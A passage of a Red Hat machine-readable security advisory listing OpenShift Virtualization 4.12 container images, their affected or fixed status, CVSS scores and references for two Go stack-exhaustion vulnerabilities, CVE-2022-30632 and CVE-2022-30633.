"8Base-CNV-4.12:container-native-virtualization/virt-cdi-importer@sha256:f2d011c18db1dd0dbe068bc650418c4b3f2f94935c053e76a52736da0f33867a_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-operator@sha256:8b06f96750c3f8e34a7cc8defeda46a92e3ad553159d3dbc7c4e096b483508ee_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-uploadproxy@sha256:84fd85672f6e9891678d6e99c066f8f20a9a2aac08fae11d552d46a317b7f815_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-uploadserver@sha256:4b231a260a9c0176f4b45aaf8142fa5e6860892b2fa19fad0f3091c423064211_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-controller@sha256:e6ddc32f82e940d364e0a3d63c28b4bd41b71574f9479b6d6b01de948baa8cab_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-exportproxy@sha256:2dc6b5eca4ba0daffe57ff174efc35764a2021eef35ef84c3d030c0f97329ece_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-exportserver@sha256:dd59838c20f30c7049cbdc4646b8b6f73ce8f33fa13c352ee22985673eaf95e2_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-handler@sha256:cce366a6b1aa42a9798a8c714dcb795d1c653dfe0ba06c997e65dbba0318e537_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-launcher@sha256:bd5b00ece84caed816b3f3cc80d8570324e1e8f975cf2c2320726d88fb64f33a_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-operator@sha256:6c4b16ac62e673d8f5116d592836506be72c5ebd2a07ffc828fee86514db0e9d_amd64", "8Base-CNV-4.12:container-native-virtualization/virtio-win@sha256:cd321e3d82a87139edabf223414b892c99857d7ac7d089b870e227ea98c970e0_amd64", "8Base-CNV-4.12:container-native-virtualization/vm-network-latency-checkup@sha256:5a1502efeeaa3958e5755ce07dcb8314305d75c88cc69ddc7d515457935cdc69_amd64", ], }, references: [ { category: "self", summary: "Canonical URL", url: "https://access.redhat.com/security/cve/CVE-2022-30632", }, { category: "external", summary: "RHBZ#2107386", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2107386", }, { category: "external", summary: "https://www.cve.org/CVERecord?id=CVE-2022-30632", url: "https://www.cve.org/CVERecord?id=CVE-2022-30632", }, { category: "external", summary: "https://nvd.nist.gov/vuln/detail/CVE-2022-30632", url: "https://nvd.nist.gov/vuln/detail/CVE-2022-30632", }, { category: "external", summary: "https://go.dev/issue/53416", url: "https://go.dev/issue/53416", }, { category: "external", summary: "https://groups.google.com/g/golang-announce/c/nqrv9fbR0zE", url: "https://groups.google.com/g/golang-announce/c/nqrv9fbR0zE", }, ], release_date: "2022-07-12T00:00:00+00:00", remediations: [ { category: "vendor_fix", date: "2023-01-25T11:11:29+00:00", details: "Before applying this update, you must apply all previously released errata\nrelevant to your system.\n\nTo apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258", product_ids: [ "8Base-CNV-4.12:container-native-virtualization/virt-api@sha256:cd89350a5e6b3a468acd290819d86f2c77d486fa5a57dbac752f863f1a8a2b23_amd64", ], restart_required: { category: "none", }, url: "https://access.redhat.com/errata/RHSA-2023:0408", }, ], scores: [ { cvss_v3: { attackComplexity: "LOW", attackVector: "NETWORK", availabilityImpact: "HIGH", baseScore: 7.5, baseSeverity: "HIGH", confidentialityImpact: "NONE", integrityImpact: "NONE", privilegesRequired: "NONE", scope: "UNCHANGED", userInteraction: "NONE", vectorString: "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", version: "3.1", }, products: [ "8Base-CNV-4.12:container-native-virtualization/bridge-marker@sha256:086a9922f34161e5b75d204a0c3281c941f81f76ef8784de434cc79acc76174c_amd64", "8Base-CNV-4.12:container-native-virtualization/cluster-network-addons-operator@sha256:d2c19fd4c2327eb84179acf652157982b29c365d8a526d70517c6dd93ea6ebc7_amd64", "8Base-CNV-4.12:container-native-virtualization/cnv-containernetworking-plugins@sha256:3d6003dea97e48d240668e55b2705f0251259006251abafaa3dc08fbc69f1312_amd64", "8Base-CNV-4.12:container-native-virtualization/cnv-must-gather-rhel8@sha256:dcb95d2b4958ce69f8fcf61c9c90e0516d7844db62f2297ebf1ef18e5d8c05b4_amd64", "8Base-CNV-4.12:container-native-virtualization/hco-bundle-registry@sha256:73680901c7733ba27f729fd6475971e0909c2fe9efacf74d556f961a1494274e_amd64", "8Base-CNV-4.12:container-native-virtualization/hostpath-csi-driver@sha256:a0b75e357628ca6b2ca32ab3fdbf531fd8da438a7a6ae8988ef897d2c001d9cb_amd64", "8Base-CNV-4.12:container-native-virtualization/hostpath-provisioner-rhel8-operator@sha256:b9d84e63f789c70e31cf60fe06d41359363afc7bbd86a78ac7132f8dae4c467a_amd64", "8Base-CNV-4.12:container-native-virtualization/hostpath-provisioner-rhel8@sha256:5239dcb229b060a818befd52a1e27b18142985abe0e39cef41eadd66f8b21ec1_amd64", "8Base-CNV-4.12:container-native-virtualization/hyperconverged-cluster-operator@sha256:8b311b48437c79a6859a84f62cfd10ca8e6dcff4ce665a98ed78633552a172ca_amd64", "8Base-CNV-4.12:container-native-virtualization/hyperconverged-cluster-webhook-rhel8@sha256:e912171328517664f0298322a7992a6e0e00118dc496ff94ee84190d9057db68_amd64", "8Base-CNV-4.12:container-native-virtualization/kubemacpool@sha256:ab5a239a35e3de8566cb76db0d59ae92e290a3756d39a2298290f1ab3c7b56c5_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-console-plugin@sha256:e7dd17d4d206b2d37f24a2ed28bf3d2d6a40463da6cbc6b5696555b455f90055_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-ssp-operator@sha256:09a834b1f71a19cf9a616ffd9eb04408972f9b8f9549777cab0935f63931c993_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-cleanup-vm@sha256:66284c45e82862dc7c1505fcdfe7b14e72c93c5e7fa6b7108a945220279641e9_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-copy-template@sha256:462770d258407ea93c14c9a99fb4450536261202d1d63a681634af2193c2b062_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-create-datavolume@sha256:31d22c0be03bbb222967d953d35189173fbeb60d1cb32278eb006e8abe78e90c_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-create-vm-from-template@sha256:a62ec91155a7bfc776c402e8b513b0e00797d64a95434346a2e3a4cc25f2d3c5_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-customize@sha256:35274b72a5562e8675854d8cf2ca3ec0c4d0b619c0e630d7b39b7da8ebd3b143_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-sysprep@sha256:6e6ed3d8b1b906f801e36b82d6976bc421ae8344d71d4c563fe6d8e76b5fe9c4_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-modify-vm-template@sha256:b46443d7f21b8b251468e33c929a16008a3ac34a8f50a1d8bc1cd134079ccae4_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-operator@sha256:7f11db20a3c635aa48e3dcadfe555d0cd229c4c7f1790f70ee9c9ee78ab55e67_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-wait-for-vmi-status@sha256:4967b4c46d670a2b109c9a2e6e0ebc850a5e1dacaf8cc0ed691668bfa0cbd418_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-template-validator@sha256:bf732669655db1b09ef27bc1964fe7b49943d681a5acc9860497512d8877e13f_amd64", "8Base-CNV-4.12:container-native-virtualization/libguestfs-tools@sha256:4f0d48312d8fe02a17747d65ac644d3e1be2df3cb80a9d0c268acc6ad5b91680_amd64", "8Base-CNV-4.12:container-native-virtualization/ovs-cni-marker@sha256:077367d5af11030832a5e63a611395b7fa65ee140b490b6f33f8a23a9392dcd5_amd64", "8Base-CNV-4.12:container-native-virtualization/ovs-cni-plugin@sha256:892e339e8eec78f9865d11984c6dc8e92831ee9a17d6b990cd7fba9f2e506e13_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-api@sha256:cd89350a5e6b3a468acd290819d86f2c77d486fa5a57dbac752f863f1a8a2b23_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-artifacts-server@sha256:9638c34ff48d275842a990deb86110530ffd4937b2b551a4d5263168f7db6d47_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-apiserver@sha256:dd68dfc1a588b4e24e533d61b52b68ab0673fd39a95632314f54e1b85cb5f32d_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-cloner@sha256:879742e59f3416100969a0d0994e49e3f8cd493310bbd0c0e86e969f86daa204_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-controller@sha256:46689591989c8db1fa1f5228b2b9fb51d7abd0425c34951f909ced1fc536f0e4_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-importer@sha256:f2d011c18db1dd0dbe068bc650418c4b3f2f94935c053e76a52736da0f33867a_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-operator@sha256:8b06f96750c3f8e34a7cc8defeda46a92e3ad553159d3dbc7c4e096b483508ee_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-uploadproxy@sha256:84fd85672f6e9891678d6e99c066f8f20a9a2aac08fae11d552d46a317b7f815_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-uploadserver@sha256:4b231a260a9c0176f4b45aaf8142fa5e6860892b2fa19fad0f3091c423064211_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-controller@sha256:e6ddc32f82e940d364e0a3d63c28b4bd41b71574f9479b6d6b01de948baa8cab_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-exportproxy@sha256:2dc6b5eca4ba0daffe57ff174efc35764a2021eef35ef84c3d030c0f97329ece_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-exportserver@sha256:dd59838c20f30c7049cbdc4646b8b6f73ce8f33fa13c352ee22985673eaf95e2_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-handler@sha256:cce366a6b1aa42a9798a8c714dcb795d1c653dfe0ba06c997e65dbba0318e537_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-launcher@sha256:bd5b00ece84caed816b3f3cc80d8570324e1e8f975cf2c2320726d88fb64f33a_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-operator@sha256:6c4b16ac62e673d8f5116d592836506be72c5ebd2a07ffc828fee86514db0e9d_amd64", "8Base-CNV-4.12:container-native-virtualization/virtio-win@sha256:cd321e3d82a87139edabf223414b892c99857d7ac7d089b870e227ea98c970e0_amd64", "8Base-CNV-4.12:container-native-virtualization/vm-network-latency-checkup@sha256:5a1502efeeaa3958e5755ce07dcb8314305d75c88cc69ddc7d515457935cdc69_amd64", ], }, ], threats: [ { category: "impact", details: "Moderate", }, ], title: "golang: path/filepath: stack exhaustion in Glob", }, { cve: "CVE-2022-30633", cwe: { id: "CWE-1325", name: "Improperly Controlled Sequential Memory Allocation", }, discovery_date: "2022-07-14T00:00:00+00:00", flags: [ { label: "vulnerable_code_not_present", product_ids: [ "8Base-CNV-4.12:container-native-virtualization/bridge-marker@sha256:086a9922f34161e5b75d204a0c3281c941f81f76ef8784de434cc79acc76174c_amd64", "8Base-CNV-4.12:container-native-virtualization/cluster-network-addons-operator@sha256:d2c19fd4c2327eb84179acf652157982b29c365d8a526d70517c6dd93ea6ebc7_amd64", "8Base-CNV-4.12:container-native-virtualization/cnv-containernetworking-plugins@sha256:3d6003dea97e48d240668e55b2705f0251259006251abafaa3dc08fbc69f1312_amd64", "8Base-CNV-4.12:container-native-virtualization/cnv-must-gather-rhel8@sha256:dcb95d2b4958ce69f8fcf61c9c90e0516d7844db62f2297ebf1ef18e5d8c05b4_amd64", "8Base-CNV-4.12:container-native-virtualization/hco-bundle-registry@sha256:73680901c7733ba27f729fd6475971e0909c2fe9efacf74d556f961a1494274e_amd64", "8Base-CNV-4.12:container-native-virtualization/hostpath-csi-driver@sha256:a0b75e357628ca6b2ca32ab3fdbf531fd8da438a7a6ae8988ef897d2c001d9cb_amd64", "8Base-CNV-4.12:container-native-virtualization/hostpath-provisioner-rhel8-operator@sha256:b9d84e63f789c70e31cf60fe06d41359363afc7bbd86a78ac7132f8dae4c467a_amd64", "8Base-CNV-4.12:container-native-virtualization/hostpath-provisioner-rhel8@sha256:5239dcb229b060a818befd52a1e27b18142985abe0e39cef41eadd66f8b21ec1_amd64", "8Base-CNV-4.12:container-native-virtualization/hyperconverged-cluster-operator@sha256:8b311b48437c79a6859a84f62cfd10ca8e6dcff4ce665a98ed78633552a172ca_amd64", "8Base-CNV-4.12:container-native-virtualization/hyperconverged-cluster-webhook-rhel8@sha256:e912171328517664f0298322a7992a6e0e00118dc496ff94ee84190d9057db68_amd64", "8Base-CNV-4.12:container-native-virtualization/kubemacpool@sha256:ab5a239a35e3de8566cb76db0d59ae92e290a3756d39a2298290f1ab3c7b56c5_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-console-plugin@sha256:e7dd17d4d206b2d37f24a2ed28bf3d2d6a40463da6cbc6b5696555b455f90055_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-ssp-operator@sha256:09a834b1f71a19cf9a616ffd9eb04408972f9b8f9549777cab0935f63931c993_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-cleanup-vm@sha256:66284c45e82862dc7c1505fcdfe7b14e72c93c5e7fa6b7108a945220279641e9_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-copy-template@sha256:462770d258407ea93c14c9a99fb4450536261202d1d63a681634af2193c2b062_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-create-datavolume@sha256:31d22c0be03bbb222967d953d35189173fbeb60d1cb32278eb006e8abe78e90c_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-create-vm-from-template@sha256:a62ec91155a7bfc776c402e8b513b0e00797d64a95434346a2e3a4cc25f2d3c5_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-customize@sha256:35274b72a5562e8675854d8cf2ca3ec0c4d0b619c0e630d7b39b7da8ebd3b143_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-sysprep@sha256:6e6ed3d8b1b906f801e36b82d6976bc421ae8344d71d4c563fe6d8e76b5fe9c4_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-modify-vm-template@sha256:b46443d7f21b8b251468e33c929a16008a3ac34a8f50a1d8bc1cd134079ccae4_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-operator@sha256:7f11db20a3c635aa48e3dcadfe555d0cd229c4c7f1790f70ee9c9ee78ab55e67_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-wait-for-vmi-status@sha256:4967b4c46d670a2b109c9a2e6e0ebc850a5e1dacaf8cc0ed691668bfa0cbd418_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-template-validator@sha256:bf732669655db1b09ef27bc1964fe7b49943d681a5acc9860497512d8877e13f_amd64", "8Base-CNV-4.12:container-native-virtualization/libguestfs-tools@sha256:4f0d48312d8fe02a17747d65ac644d3e1be2df3cb80a9d0c268acc6ad5b91680_amd64", "8Base-CNV-4.12:container-native-virtualization/ovs-cni-marker@sha256:077367d5af11030832a5e63a611395b7fa65ee140b490b6f33f8a23a9392dcd5_amd64", "8Base-CNV-4.12:container-native-virtualization/ovs-cni-plugin@sha256:892e339e8eec78f9865d11984c6dc8e92831ee9a17d6b990cd7fba9f2e506e13_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-artifacts-server@sha256:9638c34ff48d275842a990deb86110530ffd4937b2b551a4d5263168f7db6d47_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-apiserver@sha256:dd68dfc1a588b4e24e533d61b52b68ab0673fd39a95632314f54e1b85cb5f32d_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-cloner@sha256:879742e59f3416100969a0d0994e49e3f8cd493310bbd0c0e86e969f86daa204_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-controller@sha256:46689591989c8db1fa1f5228b2b9fb51d7abd0425c34951f909ced1fc536f0e4_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-importer@sha256:f2d011c18db1dd0dbe068bc650418c4b3f2f94935c053e76a52736da0f33867a_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-operator@sha256:8b06f96750c3f8e34a7cc8defeda46a92e3ad553159d3dbc7c4e096b483508ee_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-uploadproxy@sha256:84fd85672f6e9891678d6e99c066f8f20a9a2aac08fae11d552d46a317b7f815_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-uploadserver@sha256:4b231a260a9c0176f4b45aaf8142fa5e6860892b2fa19fad0f3091c423064211_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-controller@sha256:e6ddc32f82e940d364e0a3d63c28b4bd41b71574f9479b6d6b01de948baa8cab_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-exportproxy@sha256:2dc6b5eca4ba0daffe57ff174efc35764a2021eef35ef84c3d030c0f97329ece_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-exportserver@sha256:dd59838c20f30c7049cbdc4646b8b6f73ce8f33fa13c352ee22985673eaf95e2_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-handler@sha256:cce366a6b1aa42a9798a8c714dcb795d1c653dfe0ba06c997e65dbba0318e537_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-launcher@sha256:bd5b00ece84caed816b3f3cc80d8570324e1e8f975cf2c2320726d88fb64f33a_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-operator@sha256:6c4b16ac62e673d8f5116d592836506be72c5ebd2a07ffc828fee86514db0e9d_amd64", "8Base-CNV-4.12:container-native-virtualization/virtio-win@sha256:cd321e3d82a87139edabf223414b892c99857d7ac7d089b870e227ea98c970e0_amd64", "8Base-CNV-4.12:container-native-virtualization/vm-network-latency-checkup@sha256:5a1502efeeaa3958e5755ce07dcb8314305d75c88cc69ddc7d515457935cdc69_amd64", ], }, ], ids: [ { system_name: "Red Hat Bugzilla ID", text: "2107392", }, ], notes: [ { category: "description", text: "A flaw was found in golang. Calling Unmarshal on an XML document into a Go struct, which has a nested field that uses the \"any\" field tag, can cause a panic due to stack exhaustion.", title: "Vulnerability description", }, { category: "summary", text: "golang: encoding/xml: stack exhaustion in Unmarshal", title: "Vulnerability summary", }, { category: "general", text: "The CVSS score(s) listed for this vulnerability do not reflect the associated product's status, and are included for informational purposes to better understand the severity of this vulnerability.", title: "CVSS score applicability", }, ], product_status: { fixed: [ "8Base-CNV-4.12:container-native-virtualization/virt-api@sha256:cd89350a5e6b3a468acd290819d86f2c77d486fa5a57dbac752f863f1a8a2b23_amd64", ], known_not_affected: [ "8Base-CNV-4.12:container-native-virtualization/bridge-marker@sha256:086a9922f34161e5b75d204a0c3281c941f81f76ef8784de434cc79acc76174c_amd64", "8Base-CNV-4.12:container-native-virtualization/cluster-network-addons-operator@sha256:d2c19fd4c2327eb84179acf652157982b29c365d8a526d70517c6dd93ea6ebc7_amd64", "8Base-CNV-4.12:container-native-virtualization/cnv-containernetworking-plugins@sha256:3d6003dea97e48d240668e55b2705f0251259006251abafaa3dc08fbc69f1312_amd64", "8Base-CNV-4.12:container-native-virtualization/cnv-must-gather-rhel8@sha256:dcb95d2b4958ce69f8fcf61c9c90e0516d7844db62f2297ebf1ef18e5d8c05b4_amd64", "8Base-CNV-4.12:container-native-virtualization/hco-bundle-registry@sha256:73680901c7733ba27f729fd6475971e0909c2fe9efacf74d556f961a1494274e_amd64", "8Base-CNV-4.12:container-native-virtualization/hostpath-csi-driver@sha256:a0b75e357628ca6b2ca32ab3fdbf531fd8da438a7a6ae8988ef897d2c001d9cb_amd64", "8Base-CNV-4.12:container-native-virtualization/hostpath-provisioner-rhel8-operator@sha256:b9d84e63f789c70e31cf60fe06d41359363afc7bbd86a78ac7132f8dae4c467a_amd64", "8Base-CNV-4.12:container-native-virtualization/hostpath-provisioner-rhel8@sha256:5239dcb229b060a818befd52a1e27b18142985abe0e39cef41eadd66f8b21ec1_amd64", "8Base-CNV-4.12:container-native-virtualization/hyperconverged-cluster-operator@sha256:8b311b48437c79a6859a84f62cfd10ca8e6dcff4ce665a98ed78633552a172ca_amd64", "8Base-CNV-4.12:container-native-virtualization/hyperconverged-cluster-webhook-rhel8@sha256:e912171328517664f0298322a7992a6e0e00118dc496ff94ee84190d9057db68_amd64", "8Base-CNV-4.12:container-native-virtualization/kubemacpool@sha256:ab5a239a35e3de8566cb76db0d59ae92e290a3756d39a2298290f1ab3c7b56c5_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-console-plugin@sha256:e7dd17d4d206b2d37f24a2ed28bf3d2d6a40463da6cbc6b5696555b455f90055_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-ssp-operator@sha256:09a834b1f71a19cf9a616ffd9eb04408972f9b8f9549777cab0935f63931c993_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-cleanup-vm@sha256:66284c45e82862dc7c1505fcdfe7b14e72c93c5e7fa6b7108a945220279641e9_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-copy-template@sha256:462770d258407ea93c14c9a99fb4450536261202d1d63a681634af2193c2b062_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-create-datavolume@sha256:31d22c0be03bbb222967d953d35189173fbeb60d1cb32278eb006e8abe78e90c_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-create-vm-from-template@sha256:a62ec91155a7bfc776c402e8b513b0e00797d64a95434346a2e3a4cc25f2d3c5_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-customize@sha256:35274b72a5562e8675854d8cf2ca3ec0c4d0b619c0e630d7b39b7da8ebd3b143_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-sysprep@sha256:6e6ed3d8b1b906f801e36b82d6976bc421ae8344d71d4c563fe6d8e76b5fe9c4_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-modify-vm-template@sha256:b46443d7f21b8b251468e33c929a16008a3ac34a8f50a1d8bc1cd134079ccae4_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-operator@sha256:7f11db20a3c635aa48e3dcadfe555d0cd229c4c7f1790f70ee9c9ee78ab55e67_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-wait-for-vmi-status@sha256:4967b4c46d670a2b109c9a2e6e0ebc850a5e1dacaf8cc0ed691668bfa0cbd418_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-template-validator@sha256:bf732669655db1b09ef27bc1964fe7b49943d681a5acc9860497512d8877e13f_amd64", "8Base-CNV-4.12:container-native-virtualization/libguestfs-tools@sha256:4f0d48312d8fe02a17747d65ac644d3e1be2df3cb80a9d0c268acc6ad5b91680_amd64", "8Base-CNV-4.12:container-native-virtualization/ovs-cni-marker@sha256:077367d5af11030832a5e63a611395b7fa65ee140b490b6f33f8a23a9392dcd5_amd64", "8Base-CNV-4.12:container-native-virtualization/ovs-cni-plugin@sha256:892e339e8eec78f9865d11984c6dc8e92831ee9a17d6b990cd7fba9f2e506e13_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-artifacts-server@sha256:9638c34ff48d275842a990deb86110530ffd4937b2b551a4d5263168f7db6d47_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-apiserver@sha256:dd68dfc1a588b4e24e533d61b52b68ab0673fd39a95632314f54e1b85cb5f32d_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-cloner@sha256:879742e59f3416100969a0d0994e49e3f8cd493310bbd0c0e86e969f86daa204_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-controller@sha256:46689591989c8db1fa1f5228b2b9fb51d7abd0425c34951f909ced1fc536f0e4_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-importer@sha256:f2d011c18db1dd0dbe068bc650418c4b3f2f94935c053e76a52736da0f33867a_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-operator@sha256:8b06f96750c3f8e34a7cc8defeda46a92e3ad553159d3dbc7c4e096b483508ee_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-uploadproxy@sha256:84fd85672f6e9891678d6e99c066f8f20a9a2aac08fae11d552d46a317b7f815_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-uploadserver@sha256:4b231a260a9c0176f4b45aaf8142fa5e6860892b2fa19fad0f3091c423064211_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-controller@sha256:e6ddc32f82e940d364e0a3d63c28b4bd41b71574f9479b6d6b01de948baa8cab_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-exportproxy@sha256:2dc6b5eca4ba0daffe57ff174efc35764a2021eef35ef84c3d030c0f97329ece_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-exportserver@sha256:dd59838c20f30c7049cbdc4646b8b6f73ce8f33fa13c352ee22985673eaf95e2_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-handler@sha256:cce366a6b1aa42a9798a8c714dcb795d1c653dfe0ba06c997e65dbba0318e537_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-launcher@sha256:bd5b00ece84caed816b3f3cc80d8570324e1e8f975cf2c2320726d88fb64f33a_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-operator@sha256:6c4b16ac62e673d8f5116d592836506be72c5ebd2a07ffc828fee86514db0e9d_amd64", "8Base-CNV-4.12:container-native-virtualization/virtio-win@sha256:cd321e3d82a87139edabf223414b892c99857d7ac7d089b870e227ea98c970e0_amd64", "8Base-CNV-4.12:container-native-virtualization/vm-network-latency-checkup@sha256:5a1502efeeaa3958e5755ce07dcb8314305d75c88cc69ddc7d515457935cdc69_amd64", ], }, references: [ { category: "self", summary: "Canonical URL", url: "https://access.redhat.com/security/cve/CVE-2022-30633", }, { category: "external", summary: "RHBZ#2107392", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2107392", }, { category: "external", summary: "https://www.cve.org/CVERecord?id=CVE-2022-30633", url: "https://www.cve.org/CVERecord?id=CVE-2022-30633", }, { category: "external", summary: "https://nvd.nist.gov/vuln/detail/CVE-2022-30633", url: "https://nvd.nist.gov/vuln/detail/CVE-2022-30633", }, { category: "external", summary: "https://go.dev/issue/53611", url: "https://go.dev/issue/53611", }, { category: "external", summary: "https://groups.google.com/g/golang-announce/c/nqrv9fbR0zE", url: "https://groups.google.com/g/golang-announce/c/nqrv9fbR0zE", }, ], release_date: "2022-07-12T00:00:00+00:00", remediations: [ { category: "vendor_fix", date: "2023-01-25T11:11:29+00:00", details: "Before applying this update, you must apply all previously released errata\nrelevant to your system.\n\nTo apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258", product_ids: [ "8Base-CNV-4.12:container-native-virtualization/virt-api@sha256:cd89350a5e6b3a468acd290819d86f2c77d486fa5a57dbac752f863f1a8a2b23_amd64", ], restart_required: { category: "none", }, url: "https://access.redhat.com/errata/RHSA-2023:0408", }, ], scores: [ { cvss_v3: { attackComplexity: "LOW", attackVector: "NETWORK", availabilityImpact: "HIGH", baseScore: 7.5, baseSeverity: "HIGH", confidentialityImpact: "NONE", integrityImpact: "NONE", privilegesRequired: "NONE", scope: "UNCHANGED", userInteraction: "NONE", vectorString: "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", version: "3.1", }, products: [ "8Base-CNV-4.12:container-native-virtualization/bridge-marker@sha256:086a9922f34161e5b75d204a0c3281c941f81f76ef8784de434cc79acc76174c_amd64", "8Base-CNV-4.12:container-native-virtualization/cluster-network-addons-operator@sha256:d2c19fd4c2327eb84179acf652157982b29c365d8a526d70517c6dd93ea6ebc7_amd64", "8Base-CNV-4.12:container-native-virtualization/cnv-containernetworking-plugins@sha256:3d6003dea97e48d240668e55b2705f0251259006251abafaa3dc08fbc69f1312_amd64", "8Base-CNV-4.12:container-native-virtualization/cnv-must-gather-rhel8@sha256:dcb95d2b4958ce69f8fcf61c9c90e0516d7844db62f2297ebf1ef18e5d8c05b4_amd64", "8Base-CNV-4.12:container-native-virtualization/hco-bundle-registry@sha256:73680901c7733ba27f729fd6475971e0909c2fe9efacf74d556f961a1494274e_amd64", "8Base-CNV-4.12:container-native-virtualization/hostpath-csi-driver@sha256:a0b75e357628ca6b2ca32ab3fdbf531fd8da438a7a6ae8988ef897d2c001d9cb_amd64", "8Base-CNV-4.12:container-native-virtualization/hostpath-provisioner-rhel8-operator@sha256:b9d84e63f789c70e31cf60fe06d41359363afc7bbd86a78ac7132f8dae4c467a_amd64", "8Base-CNV-4.12:container-native-virtualization/hostpath-provisioner-rhel8@sha256:5239dcb229b060a818befd52a1e27b18142985abe0e39cef41eadd66f8b21ec1_amd64", "8Base-CNV-4.12:container-native-virtualization/hyperconverged-cluster-operator@sha256:8b311b48437c79a6859a84f62cfd10ca8e6dcff4ce665a98ed78633552a172ca_amd64", "8Base-CNV-4.12:container-native-virtualization/hyperconverged-cluster-webhook-rhel8@sha256:e912171328517664f0298322a7992a6e0e00118dc496ff94ee84190d9057db68_amd64", 